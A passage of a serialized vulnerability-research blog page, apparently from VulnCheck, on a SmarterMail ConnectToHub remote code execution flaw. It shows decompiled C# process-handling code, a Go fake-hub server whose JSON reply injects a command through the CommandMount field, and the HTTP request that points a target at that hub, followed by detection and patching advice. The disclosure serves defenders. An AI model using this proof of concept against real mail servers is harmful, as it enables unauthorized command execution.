args",[1373,18213,11875],{"class":1383},[1373,18215,18216],{"class":1375,"line":7688},[1373,18217,9788],{"class":1383},[1373,18219,18220,18222,18224,18226,18228,18230,18233,18235,18238,18240,18243],{"class":1375,"line":7709},[1373,18221,9793],{"class":4636},[1373,18223,4641],{"class":1383},[1373,18225,16090],{"class":1397},[1373,18227,15752],{"class":1397},[1373,18229,59],{"class":1383},[1373,18231,18232],{"class":7297},"IsNullOrEmpty",[1373,18234,1384],{"class":1383},[1373,18236,18237],{"class":4640},"args",[1373,18239,59],{"class":1383},[1373,18241,18242],{"class":4640},"Data",[1373,18244,16761],{"class":1383},[1373,18246,18247],{"class":1375,"line":7714},[1373,18248,9814],{"class":1383},[1373,18250,18251,18254,18256,18259,18261,18263,18265,18267],{"class":1375,"line":7722},[1373,18252,18253],{"class":4640}," resultSb",[1373,18255,59],{"class":1383},[1373,18257,18258],{"class":7297},"AppendLine",[1373,18260,1384],{"class":1383},[1373,18262,18237],{"class":4640},[1373,18264,59],{"class":1383},[1373,18266,18242],{"class":4640},[1373,18268,4680],{"class":1383},[1373,18270,18271,18274,18276,18278,18280,18283,18285,18287],{"class":1375,"line":9903},[1373,18272,18273],{"class":14938}," Action",[1373,18275,11852],{"class":1383},[1373,18277,15752],{"class":1397},[1373,18279,5384],{"class":1383},[1373,18281,18282],{"class":9372}," processOutputLine5",[1373,18284,8575],{"class":1397},[1373,18286,17764],{"class":4640},[1373,18288,4912],{"class":1383},[1373,18290,18291,18294,18296,18299,18301,18303],{"class":1375,"line":9908},[1373,18292,18293],{"class":4636}," if",[1373,18295,4641],{"class":1383},[1373,18297,18298],{"class":4640},"processOutputLine5 ",[1373,18300,15920],{"class":1397},[1373,18302,15680],{"class":7054},[1373,18304,11875],{"class":1383},[1373,18306,18307],{"class":1375,"line":9913},[1373,18308,15802],{"class":1383},[1373,18310,18311,18314],{"class":1375,"line":9932},[1373,18312,18313],{"class":4636}," return",[1373,18315,4912],{"class":1383},[1373,18317,18318],{"class":1375,"line":9937},[1373,18319,18320],{"class":1383}," }\n",[1373,18322,18323,18326,18328,18330,18332,18334],{"class":1375,"line":9957},[1373,18324,18325],{"class":7297}," processOutputLine5",[1373,18327,1384],{"class":1383},[1373,18329,18237],{"class":4640},[1373,18331,59],{"class":1383},[1373,18333,18242],{"class":4640},[1373,18335,4680],{"class":1383},[1373,18337,18338],{"class":1375,"line":9962},[1373,18339,9832],{"class":1383},[1373,18341,18342],{"class":1375,"line":15955},[1373,18343,18344],{"class":1383}," };\n",[1373,18346,18347,18349,18351,18354,18356,18358,18360,18362,18364,18366,18368,18370],{"class":1375,"line":16030},[1373,18348,18184],{"class":4640},[1373,18350,59],{"class":1383},[1373,18352,18353],{"class":4640},"ErrorDataReceived ",[1373,18355,18192],{"class":1397},[1373,18357,18196],{"class":18195},[1373,18359,1384],{"class":1383},[1373,18361,13374],{"class":1397},[1373,18363,18203],{"class":9372},[1373,18365,5437],{"class":1383},[1373,18367,18208],{"class":14938},[1373,18369,18211],{"class":9372},[1373,18371,11875],{"class":1383},[1373,18373,18374],{"class":1375,"line":16035},[1373,18375,9788],{"class":1383},[1373,18377,18378,18380,18382,18384,18386,18388,18390,18392,18394,18396,18398],{"class":1375,"line":16083},[1373,18379,9793],{"class":4636},[1373,18381,4641],{"class":1383},[1373,18383,16090],{"class":1397},[1373,18385,15752],{"class":1397},[1373,18387,59],{"class":1383},[1373,18389,18232],{"class":7297},[1373,18391,1384],{"class":1383},[1373,18393,18237],{"class":4640},[1373,18395,59],{"class":1383},[1373,18397,18242],{"class":4640},[1373,18399,16761],{"class":1383},[1373,18401,18402],{"class":1375,"line":16098},[1373,18403,9814],{"class":1383},[1373,18405,18406,18408,18410,18412,18414,18416,18418,18420],{"class":1375,"line":16103},[1373,18407,18253],{"class":4640},[1373,18409,59],{"class":1383},[1373,18411,18258],{"class":7297},[1373,18413,1384],{"class":1383},[1373,18415,18237],{"class":4640},[1373,18417,59],{"class":1383},[1373,18419,18242],{"class":4640},[1373,18421,4680],{"class":1383},[1373,18423,18424,18426,18428,18430,18432,18435,18437,18439],{"class":1375,"line":16147},[1373,18425,18273],{"class":14938},[1373,18427,11852],{"class":1383},[1373,18429,15752],{"class":1397},[1373,18431,5384],{"class":1383},[1373,18433,18434],{"class":9372}," processOutputLine6",[1373,18436,8575],{"class":1397},[1373,18438,17764],{"class":4640},[1373,18440,4912],{"class":1383},[1373,18442,18443,18445,18447,18450,18452,18454],{"class":1375,"line":16153},[1373,18444,18293],{"class":4636},[1373,18446,4641],{"class":1383},[1373,18448,18449],{"class":4640},"processOutputLine6 ",[1373,18451,15920],{"class":1397},[1373,18453,15680],{"class":7054},[1373,18455,11875],{"class":1383},[1373,18457,18458],{"class":1375,"line":16164},[1373,18459,15802],{"class":1383},[1373,18461,18462,18464],{"class":1375,"line":16170},[1373,18463,18313],{"class":4636},[1373,18465,4912],{"class":1383},[1373,18467,18468],{"class":1375,"line":16187},[1373,18469,18320],{"class":1383},[1373,18471,18472,18475,18477,18479,18481,18483],{"class":1375,"line":16198},[1373,18473,18474],{"class":7297}," processOutputLine6",[1373,18476,1384],{"class":1383},[1373,18478,18237],{"class":4640},[1373,18480,59],{"class":1383},[1373,18482,18242],{"class":4640},[1373,18484,4680],{"class":1383},[1373,18486,18487],{"class":1375,"line":16204},[1373,18488,9832],{"class":1383},[1373,18490,18491],{"class":1375,"line":16210},[1373,18492,18344],{"class":1383},[1373,18494,18495],{"class":1375,"line":16254},[1373,18496,15297],{"class":4636},[1373,18498,18500],{"class":1375,"line":18499},60,[1373,18501,9788],{"class":1383},[1373,18503,18505,18508,18510,18513],{"class":1375,"line":18504},61,[1373,18506,18507],{"class":4640}," process",[1373,18509,59],{"class":1383},[1373,18511,18512],{"class":7297},"Start",[1373,18514,15603],{"class":1383},[1373,18516,18518,18520,18522,18525],{"class":1375,"line":18517},62,[1373,18519,18507],{"class":4640},[1373,18521,59],{"class":1383},[1373,18523,18524],{"class":7297},"BeginOutputReadLine",[1373,18526,15603],{"class":1383},[1373,18528,18530,18532,18534,18537],{"class":1375,"line":18529},63,[1373,18531,18507],{"class":4640},[1373,18533,59],{"class":1383},[1373,18535,18536],{"class":7297},"BeginErrorReadLine",[1373,18538,15603],{"class":1383},[1373,18540,18542,18545,18547,18549,18551,18554,18556,18558],{"class":1375,"line":18541},64,[1373,18543,18544],{"class":14938}," Action",[1373,18546,11852],{"class":1383},[1373,18548,15752],{"class":1397},[1373,18550,5384],{"class":1383},[1373,18552,18553],{"class":9372}," processOutputLine2",[1373,18555,8575],{"class":1397},[1373,18557,17764],{"class":4640},[1373,18559,4912],{"class":1383},[1373,18561,18563,18565,18567,18570,18572,18574],{"class":1375,"line":18562},65,[1373,18564,9793],{"class":4636},[1373,18566,4641],{"class":1383},[1373,18568,18569],{"class":4640},"processOutputLine2 ",[1373,18571,15677],{"class":1397},[1373,18573,15680],{"class":7054},[1373,18575,11875],{"class":1383},[1373,18577,18579],{"class":1375,"line":18578},66,[1373,18580,9814],{"class":1383},[1373,18582,18584,18587,18589,18591,18594,18596],{"class":1375,"line":18583},67,[1373,18585,18586],{"class":7297}," processOutputLine2",[1373,18588,1384],{"class":1383},[1373,18590,183],{"class":1387},[1373,18592,18593],{"class":1391},"Waiting for process to exit.",[1373,18595,183],{"class":1387},[1373,18597,4680],{"class":1383},[1373,18599,18601],{"class":1375,"line":18600},68,[1373,18602,9832],{"class":1383},[1373,18604,18606,18609,18611,18613,18616,18618,18621,18623,18626],{"class":1375,"line":18605},69,[1373,18607,18608],{"class":1397}," await",[1373,18610,18149],{"class":4640},[1373,18612,59],{"class":1383},[1373,18614,18615],{"class":7297},"WaitForExitAsync",[1373,18617,1384],{"class":1383},[1373,18619,18620],{"class":1397},"default",[1373,18622,1384],{"class":1383},[1373,18624,18625],{"class":14938},"CancellationToken",[1373,18627,1413],{"class":1383},[1373,18629,18631,18634,18636,18638,18640,18643,18645,18647],{"class":1375,"line":18630},70,[1373,18632,18633],{"class":4640}," flag ",[1373,18635,5417],{"class":1397},[1373,18637,18149],{"class":4640},[1373,18639,59],{"class":1383},[1373,18641,18642],{"class":4640},"ExitCode ",[1373,18644,15920],{"class":1397},[1373,18646,5557],{"class":5467},[1373,18648,4912],{"class":1383},[1373,18650,18652,18654,18656,18658,18660,18662,18664,18666,18668,18670],{"class":1375,"line":18651},71,[1373,18653,17157],{"class":14938},[1373,18655,17160],{"class":9372},[1373,18657,8575],{"class":1397},[1373,18659,15283],{"class":1397},[1373,18661,17167],{"class":14938},[1373,18663,1384],{"class":1383},[1373,18665,850],{"class":5467},[1373,18667,5437],{"class":1383},[1373,18669,5468],{"class":5467},[1373,18671,4680],{"class":1383},[1373,18673,18675,18677,18679,18681,18683,18685,18688,18690],{"class":1375,"line":18674},72,[1373,18676,17183],{"class":4640},[1373,18678,59],{"class":1383},[1373,18680,17203],{"class":7297},[1373,18682,1384],{"class":1383},[1373,18684,183],{"class":1387},[1373,18686,18687],{"class":1391},"Process exit code: ",[1373,18689,183],{"class":1387},[1373,18691,4680],{"class":1383},[1373,18693,18695,18697,18699,18701,18703,18706,18708,18711,18713,18716],{"class":1375,"line":18694},73,[1373,18696,17183],{"class":4640},[1373,18698,59],{"class":1383},[1373,18700,17188],{"class":7297},[1373,18702,11852],{"class":1383},[1373,18704,18705],{"class":1397},"int",[1373,18707,15660],{"class":1383},[1373,18709,18710],{"class":4640},"process",[1373,18712,59],{"class":1383},[1373,18714,18715],{"class":4640},"ExitCode",[1373,18717,4680],{"class":1383},[1373,18719,18721,18723,18725,18727,18729,18731,18733],{"class":1375,"line":18720},74,[1373,18722,15381],{"class":1397},[1373,18724,15384],{"class":9372},[1373,18726,8575],{"class":1397},[1373,18728,17160],{"class":4640},[1373,18730,59],{"class":1383},[1373,18732,17329],{"class":7297},[1373,18734,15603],{"class":1383},[1373,18736,18738,18740,18742,18744,18746,18749,18751,18753],{"class":1375,"line":18737},75,[1373,18739,18544],{"class":14938},[1373,18741,11852],{"class":1383},[1373,18743,15752],{"class":1397},[1373,18745,5384],{"class":1383},[1373,18747,18748],{"class":9372}," processOutputLine3",[1373,18750,8575],{"class":1397},[1373,18752,17764],{"class":4640},[1373,18754,4912],{"class":1383},[1373,18756,18758,18760,18762,18765,18767,18769],{"class":1375,"line":18757},76,[1373,18759,9793],{"class":4636},[1373,18761,4641],{"class":1383},[1373,18763,18764],{"class":4640},"processOutputLine3 ",[1373,18766,15677],{"class":1397},[1373,18768,15680],{"class":7054},[1373,18770,11875],{"class":1383},[1373,18772,18774],{"class":1375,"line":18773},77,[1373,18775,9814],{"class":1383},[1373,18777,18779,18782,18784,18786],{"class":1375,"line":18778},78,[1373,18780,18781],{"class":7297}," processOutputLine3",[1373,18783,1384],{"class":1383},[1373,18785,1359],{"class":4640},[1373,18787,4680],{"class":1383},[1373,18789,18791],{"class":1375,"line":18790},79,[1373,18792,9832],{"class":1383},[1373,18794,18796,18799,18801,18803,18806,18808,18810,18812],{"class":1375,"line":18795},80,[1373,18797,18798],{"class":4640}," text ",[1373,18800,5417],{"class":1397},[1373,18802,4883],{"class":1387},[1373,18804,18805],{"class":1391},"Process Command: ",[1373,18807,183],{"class":1387},[1373,18809,15478],{"class":1397},[1373,18811,17781],{"class":4640},[1373,18813,4912],{"class":1383},[1373,18815,18817,18819,18821,18823,18825,18828,18830,18832],{"class":1375,"line":18816},81,[1373,18818,18544],{"class":14938},[1373,18820,11852],{"class":1383},[1373,18822,15752],{"class":1397},[1373,18824,5384],{"class":1383},[1373,18826,18827],{"class":9372}," processOutputLine4",[1373,18829,8575],{"class":1397},[1373,18831,17764],{"class":4640},[1373,18833,4912],{"class":1383},[1373,18835,18837,18839,18841,18844,18846,18848],{"class":1375,"line":18836},82,[1373,18838,9793],{"class":4636},[1373,18840,4641],{"class":1383},[1373,18842,18843],{"class":4640},"processOutputLine4 ",[1373,18845,15677],{"class":1397},[1373,18847,15680],{"class":7054},[1373,18849,11875],{"class":1383},[1373,18851,18853],{"class":1375,"line":18852},83,[1373,18854,9814],{"class":1383},[1373,18856,18858,18861,18863,18865],{"class":1375,"line":18857},84,[1373,18859,18860],{"class":7297}," processOutputLine4",[1373,18862,1384],{"class":1383},[1373,18864,1359],{"class":4640},[1373,18866,4680],{"class":1383},[1373,18868,18870],{"class":1375,"line":18869},85,[1373,18871,9832],{"class":1383},[1373,18873,18875],{"class":1375,"line":18874},86,[1373,18876,9861],{"class":1383},[1373,18878,18880,18883,18885,18888,18890],{"class":1375,"line":18879},87,[1373,18881,18882],{"class":4636}," catch",[1373,18884,4641],{"class":1383},[1373,18886,18887],{"class":14938},"Exception",[1373,18889,16523],{"class":9372},[1373,18891,11875],{"class":1383},[1373,18893,18895],{"class":1375,"line":18894},88,[1373,18896,9788],{"class":1383},[1373,18898,18900,18902,18904,18907,18909,18911,18913,18915,18917,18919,18921,18923,18925,18927,18930,18932,18934,18936],{"class":1375,"line":18899},89,[1373,18901,9896],{"class":4636},[1373,18903,15283],{"class":1397},[1373,18905,18906],{"class":14938}," ValueTuple",[1373,18908,11852],{"class":1383},[1373,18910,15752],{"class":1397},[1373,18912,5437],{"class":1383},[1373,18914,16303],{"class":1397},[1373,18916,5437],{"class":1383},[1373,18918,15757],{"class":1397},[1373,18920,15660],{"class":1383},[1373,18922,16574],{"class":4640},[1373,18924,59],{"class":1383},[1373,18926,15870],{"class":7297},[1373,18928,18929],{"class":1383},"(),",[1373,18931,16311],{"class":14985},[1373,18933,5437],{"class":1383},[1373,18935,17781],{"class":4640},[1373,18937,4680],{"class":1383},[1373,18939,18941],{"class":1375,"line":18940},90,[1373,18942,9861],{"class":1383},[1373,18944,18946],{"class":1375,"line":18945},91,[1373,18947,4795],{"class":1383},[1373,18949,18951,18954,18956,18958,18960],{"class":1375,"line":18950},92,[1373,18952,18953],{"class":14938}," Process",[1373,18955,18149],{"class":9372},[1373,18957,8575],{"class":1397},[1373,18959,15680],{"class":7054},[1373,18961,4912],{"class":1383},[1373,18963,18965,18967,18969,18971,18973,18975,18977,18979,18981,18983,18985,18988,18990,18992,18994,18996,18998,19000],{"class":1375,"line":18964},93,[1373,18966,7340],{"class":4636},[1373,18968,15283],{"class":1397},[1373,18970,18906],{"class":14938},[1373,18972,11852],{"class":1383},[1373,18974,15752],{"class":1397},[1373,18976,5437],{"class":1383},[1373,18978,16303],{"class":1397},[1373,18980,5437],{"class":1383},[1373,18982,15757],{"class":1397},[1373,18984,15660],{"class":1383},[1373,18986,18987],{"class":4640},"resultSb",[1373,18989,59],{"class":1383},[1373,18991,15870],{"class":7297},[1373,18993,18929],{"class":1383},[1373,18995,18132],{"class":4640},[1373,18997,5437],{"class":1383},[1373,18999,17781],{"class":4640},[1373,19001,4680],{"class":1383},[1373,19003,19005],{"class":1375,"line":19004},94,[1373,19006,1855],{"class":1383},[1373,19008,19010],{"class":1375,"line":19009},95,[1373,19011,6520],{"emptyLinePlaceholder":237},[1373,19013,19015],{"class":1375,"line":19014},96,[1373,19016,1855],{"class":4640},[18,19018,19019],{},"Putting this all together, we can create a small Go program to handle the HTTP server component. Execution on Windows platforms can also be demonstrated with the following simplistic example and HTTP request:",[1354,19021,19025],{"className":19022,"code":19023,"language":19024,"meta":219,"style":219},"language-go shiki shiki-themes material-theme-lighter github-light github-dark monokai","package main\n\nimport (\n \"fmt\"\n \"log\"\n \"net\u002Fhttp\"\n)\n\nfunc initHandler(w http.ResponseWriter, r *http.Request) {\n fmt.Println(\"Connected\")\n fmt.Fprint(w, `{\"ClusterID\":\"f0e12780-f462-4b51-a7db-149f1d56209c\", \"SharedSecret\":\"vulncheck\", \"TargetHubs\":{\"a\":\"b\"}, \"IsStandby\":false, \"SystemMount\":{\"Enabled\":true,\"ReadOnly\":false,\"MountPath\":\"\u002Fa\",\"CommandMount\":\"dir > C:\\\\pwn\"}, \"SystemAdminUsernames\":[\"poptart\"]}`)\n}\n\nfunc main() {\n http.HandleFunc(\"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection\", initHandler)\n log.Fatal(http.ListenAndServe(\":8082\", nil))\n}\n","go",[886,19026,19027,19035,19039,19046,19058,19067,19076,19080,19084,19125,19146,19172,19176,19180,19191,19215,19250],{"__ignoreMap":219},[1373,19028,19029,19032],{"class":1375,"line":1376},[1373,19030,19031],{"class":1397},"package",[1373,19033,19034],{"class":14938}," main\n",[1373,19036,19037],{"class":1375,"line":220},[1373,19038,6520],{"emptyLinePlaceholder":237},[1373,19040,19041,19044],{"class":1375,"line":1266},[1373,19042,19043],{"class":4636},"import",[1373,19045,4803],{"class":1383},[1373,19047,19048,19051,19055],{"class":1375,"line":1852},[1373,19049,19050],{"class":1387}," \"",[1373,19052,19054],{"class":19053},"sP9PO","fmt",[1373,19056,19057],{"class":1387},"\"\n",[1373,19059,19060,19062,19065],{"class":1375,"line":4692},[1373,19061,19050],{"class":1387},[1373,19063,19064],{"class":19053},"log",[1373,19066,19057],{"class":1387},[1373,19068,19069,19071,19074],{"class":1375,"line":4724},[1373,19070,19050],{"class":1387},[1373,19072,19073],{"class":19053},"net\u002Fhttp",[1373,19075,19057],{"class":1387},[1373,19077,19078],{"class":1375,"line":4756},[1373,19079,11875],{"class":1383},[1373,19081,19082],{"class":1375,"line":4768},[1373,19083,6520],{"emptyLinePlaceholder":237},[1373,19085,19086,19089,19092,19094,19098,19101,19103,19106,19108,19111,19114,19116,19118,19121,19123],{"class":1375,"line":4792},[1373,19087,19088],{"class":1397},"func",[1373,19090,19091],{"class":7297}," initHandler",[1373,19093,1384],{"class":1383},[1373,19095,19097],{"class":19096},"sQgqH","w",[1373,19099,19100],{"class":14938}," http",[1373,19102,59],{"class":1383},[1373,19104,19105],{"class":14938},"ResponseWriter",[1373,19107,5437],{"class":1383},[1373,19109,19110],{"class":19096}," r",[1373,19112,19113],{"class":1397}," *",[1373,19115,6277],{"class":14938},[1373,19117,59],{"class":1383},[1373,19119,19120],{"class":14938},"Request",[1373,19122,2230],{"class":1383},[1373,19124,4765],{"class":1383},[1373,19126,19127,19130,19132,19135,19137,19139,19142,19144],{"class":1375,"line":4798},[1373,19128,19129],{"class":4640}," fmt",[1373,19131,59],{"class":1383},[1373,19133,19134],{"class":7297},"Println",[1373,19136,1384],{"class":1383},[1373,19138,183],{"class":1387},[1373,19140,19141],{"class":1391},"Connected",[1373,19143,183],{"class":1387},[1373,19145,11875],{"class":1383},[1373,19147,19148,19150,19152,19155,19157,19159,19161,19164,19167,19170],{"class":1375,"line":4806},[1373,19149,19129],{"class":4640},[1373,19151,59],{"class":1383},[1373,19153,19154],{"class":7297},"Fprint",[1373,19156,1384],{"class":1383},[1373,19158,19097],{"class":4640},[1373,19160,5437],{"class":1383},[1373,19162,19163],{"class":1387}," `",[1373,19165,19166],{"class":1391},"{\"ClusterID\":\"f0e12780-f462-4b51-a7db-149f1d56209c\", \"SharedSecret\":\"vulncheck\", \"TargetHubs\":{\"a\":\"b\"}, \"IsStandby\":false, \"SystemMount\":{\"Enabled\":true,\"ReadOnly\":false,\"MountPath\":\"\u002Fa\",\"CommandMount\":\"dir > C:\\\\pwn\"}, \"SystemAdminUsernames\":[\"poptart\"]}",[1373,19168,19169],{"class":1387},"`",[1373,19171,11875],{"class":1383},[1373,19173,19174],{"class":1375,"line":4817},[1373,19175,1855],{"class":1383},[1373,19177,19178],{"class":1375,"line":4825},[1373,19179,6520],{"emptyLinePlaceholder":237},[1373,19181,19182,19184,19187,19189],{"class":1375,"line":4835},[1373,19183,19088],{"class":1397},[1373,19185,19186],{"class":7297}," main",[1373,19188,7514],{"class":1383},[1373,19190,4765],{"class":1383},[1373,19192,19193,19196,19198,19201,19203,19205,19207,19209,19211,19213],{"class":1375,"line":4843},[1373,19194,19195],{"class":4640}," http",[1373,19197,59],{"class":1383},[1373,19199,19200],{"class":7297},"HandleFunc",[1373,19202,1384],{"class":1383},[1373,19204,183],{"class":1387},[1373,19206,14886],{"class":1391},[1373,19208,183],{"class":1387},[1373,19210,5437],{"class":1383},[1373,19212,19091],{"class":4640},[1373,19214,11875],{"class":1383},[1373,19216,19217,19220,19222,19225,19227,19229,19231,19234,19236,19238,19241,19243,19245,19248],{"class":1375,"line":4849},[1373,19218,19219],{"class":4640}," log",[1373,19221,59],{"class":1383},[1373,19223,19224],{"class":7297},"Fatal",[1373,19226,1384],{"class":1383},[1373,19228,6277],{"class":4640},[1373,19230,59],{"class":1383},[1373,19232,19233],{"class":7297},"ListenAndServe",[1373,19235,1384],{"class":1383},[1373,19237,183],{"class":1387},[1373,19239,19240],{"class":1391},":8082",[1373,19242,183],{"class":1387},[1373,19244,5437],{"class":1383},[1373,19246,19247],{"class":7054}," nil",[1373,19249,16761],{"class":1383},[1373,19251,19252],{"class":1375,"line":4877},[1373,19253,1855],{"class":1383},[18,19255,19256,19257,19259],{},"Simply sending a request to the ",[886,19258,14878],{}," endpoint with the initial hub parameter looks like the following HTTP request:",[1354,19261,19263],{"className":6275,"code":19262,"language":6277,"meta":219,"style":219},"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: 10.0.0.174:9998\nUser-Agent: vulncheck-ua \nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nContent-Type: application\u002Fjson\nContent-Length: 89\n\n\n{\"hubAddress\":\"http:\u002F\u002F10.0.1.10:8082\", \"oneTimePassword\":\"test\", \"nodeName\": \"vulncheck\"}\n\n",[886,19264,19265,19278,19287,19299,19307,19315,19324,19328,19332],{"__ignoreMap":219},[1373,19266,19267,19269,19272,19274,19276],{"class":1375,"line":1376},[1373,19268,6946],{"class":4636},[1373,19270,19271],{"class":4640}," \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub ",[1373,19273,6290],{"class":5387},[1373,19275,2180],{"class":4640},[1373,19277,6295],{"class":5467},[1373,19279,19280,19282,19284],{"class":1375,"line":220},[1373,19281,6301],{"class":6300},[1373,19283,4606],{"class":5387},[1373,19285,19286],{"class":1391}," 10.0.0.174:9998\n",[1373,19288,19289,19291,19293,19296],{"class":1375,"line":1266},[1373,19290,6311],{"class":6300},[1373,19292,4606],{"class":5387},[1373,19294,19295],{"class":1391}," vulncheck-ua",[1373,19297,19298],{"class":4640}," \n",[1373,19300,19301,19303,19305],{"class":1375,"line":1852},[1373,19302,7013],{"class":6300},[1373,19304,4606],{"class":5387},[1373,19306,7850],{"class":1391},[1373,19308,19309,19311,19313],{"class":1375,"line":4692},[1373,19310,6391],{"class":6300},[1373,19312,4606],{"class":5387},[1373,19314,7000],{"class":1391},[1373,19316,19317,19319,19321],{"class":1375,"line":4724},[1373,19318,6411],{"class":6300},[1373,19320,4606],{"class":5387},[1373,19322,19323],{"class":1391}," 89\n",[1373,19325,19326],{"class":1375,"line":4756},[1373,19327,6520],{"emptyLinePlaceholder":237},[1373,19329,19330],{"class":1375,"line":4768},[1373,19331,6520],{"emptyLinePlaceholder":237},[1373,19333,19334,19336,19338,19340,19342,19344,19346,19349,19351,19353,19355,19357,19359,19361,19363,19366,19368,19370,19372,19375,19377,19379,19381,19384,19386],{"class":1375,"line":4792},[1373,19335,9149],{"class":1383},[1373,19337,183],{"class":9152},[1373,19339,14882],{"class":9155},[1373,19341,183],{"class":9152},[1373,19343,4606],{"class":1383},[1373,19345,183],{"class":9173},[1373,19347,19348],{"class":9176},"http:\u002F\u002F10.0.1.10:8082",[1373,19350,183],{"class":9173},[1373,19352,5437],{"class":1383},[1373,19354,4883],{"class":9152},[1373,19356,15350],{"class":9155},[1373,19358,183],{"class":9152},[1373,19360,4606],{"class":1383},[1373,19362,183],{"class":9173},[1373,19364,19365],{"class":9176},"test",[1373,19367,183],{"class":9173},[1373,19369,5437],{"class":1383},[1373,19371,4883],{"class":9152},[1373,19373,19374],{"class":9155},"nodeName",[1373,19376,183],{"class":9152},[1373,19378,4606],{"class":1383},[1373,19380,4883],{"class":9173},[1373,19382,19383],{"class":9176},"vulncheck",[1373,19385,183],{"class":9173},[1373,19387,1855],{"class":1383},[18,19389,19390],{},"Once the server reaches out and processes our dummy JSON data with the RCE, the following file is created on disk from the injected command:",[18,19392,19393],{},[68,19394],{"alt":19395,"src":19396},"SmarterMail ConnectToHub Windows Execution","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-windows-execution.png",[18,19398,19399,19400,19402,19403,19406],{},"Defenders should immediately monitor and check logs for interactions with the ",[886,19401,14872],{}," endpoint, which in patched versions will not respond with a HTTP 400 status code and error message in the current build (9511). A version number can also be retrieved unauthenticated via the ",[886,19404,19405],{},"\u002Fapi\u002Fv1\u002Flicensing\u002Fabout"," endpoint that can be used for quick validation.",[18,19408,19409],{},"SmarterMail users should update to a fixed build of the product if they have not already done so. VulnCheck is grateful to SmarterTools for their quick response and for confirming the vulnerability had already been independently reported and fixed.",[18,19411,19412,19413,19418],{},"A fully weaponized exploit that can be used across Docker, Linux, and Mac platforms is available to VulnCheck ",[295,19414,19415],{},[47,19416,1245],{"href":1258,"rel":19417},[51]," customers.",[61,19420,202],{"id":201},[18,19422,19423,19424,1246,19429,1255,19433,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and new exploits to curate. For more research like this, see ",[47,19425,19428],{"href":19426,"rel":19427},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fxwiki-cve-2025-24893-eitw",[51],"XWiki CVE-2025-24893 Exploited in the Wild",[47,19430,19432],{"href":13214,"rel":19431},[51],"Making Serialization Gadgets By Hand - .NET",[47,19434,19437],{"href":19435,"rel":19436},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",[51],"Fortinet FortiWeb Exploitation Hits Silently Patched Vulnerability",[18,19439,1228,19440,1234,19443,1240,19446,1246,19449,1255,19452,1260],{},[47,19441,1233],{"href":10806,"rel":19442},[51],[47,19444,1239],{"href":1237,"rel":19445},[51],[47,19447,1245],{"href":1243,"rel":19448},[51],[47,19450,1251],{"href":1249,"rel":19451},[51],[47,19453,216],{"href":1258,"rel":19454},[51],[2901,19456,19457],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: 